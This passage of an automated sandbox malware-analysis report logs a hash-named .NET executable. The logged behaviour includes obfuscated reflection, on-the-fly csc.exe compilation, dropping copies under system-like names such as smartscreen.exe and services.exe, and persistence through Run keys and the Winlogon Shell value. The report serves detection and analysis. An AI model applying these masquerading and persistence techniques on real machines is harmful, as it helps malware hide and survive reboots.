                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.cs .Net Code: Type.GetTypeFromHandle(Xr4ZIyrd95H8h9HFcRf.jitnEEVdkWX(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Xr4ZIyrd95H8h9HFcRf.jitnEEVdkWX(16777246)),Type.GetTypeFromHandle(Xr4ZIyrd95H8h9HFcRf.jitnEEVdkWX(16777260))})
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Code function: 0_2_00007FFD9BAE6224 push es; retf 0_2_00007FFD9BAE6225
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD9B76D2A5 pushad ; iretd 19_2_00007FFD9B76D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFD9B77D2A5 pushad ; iretd 22_2_00007FFD9B77D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFD9B962316 push 8B485F93h; iretd 22_2_00007FFD9B96231B
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Code function: 49_2_00007FFD9B8D762C push E8FFFFD1h; retf 49_2_00007FFD9B8D7631
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Code function: 50_2_00007FFD9B8D762C push E8FFFFD1h; retf 50_2_00007FFD9B8D7631
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Code function: 51_2_00007FFD9B8B762C push E8FFFFD1h; retf 51_2_00007FFD9B8B7631
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Code function: 53_2_00007FFD9B8A762C push E8FFFFD1h; retf 53_2_00007FFD9B8A7631
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, nVGn62mhEbOvCjoGrYq.csHigh entropy of concatenated method names: 'wNQmJK3IOn', 'MVRmdNQePp', 'rJemSiOpwo', 'sOoxydc9Df6DymjvEPpC', 'JPfiy3c9up3JyoyYmMeP', 'sFbMZEc9oQLwkfKAtdu6', 'LKA2K1c9TFuVWAHctsV8', 'W47Fqic9ZIkUcTlOnQ90', 'OW7tGvc9Y22KbQvNGCxL'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\JNOIyhEg.log
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, File created: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Program Files (x86)\Windows NT\smartscreen.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\syOLALyL.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\urdulIjK.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\lniDCMno.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\SVvXiHdY.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\WepxKXjB.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\rxSvtOmf.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\QgDirqoj.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\hFbfZzNA.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\LHRZphiV.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\dUteJCDk.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\ujtbHYJE.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\NidZFKNk.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\AIflJiPS.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\PxIPwdiO.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\CeJjFnSo.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\zaakdHBM.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\fePfJVil.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\rWndvGZf.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\npUmXvsj.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\bZqOSDZv.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\kIKeCfec.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\qaACfJCc.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\iuTVQPCp.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File created: C:\Users\user\Desktop\KpOqUOcm.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, File created: C:\Users\user\Desktop\zNoaAjFw.log

                            Boot Survival

                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
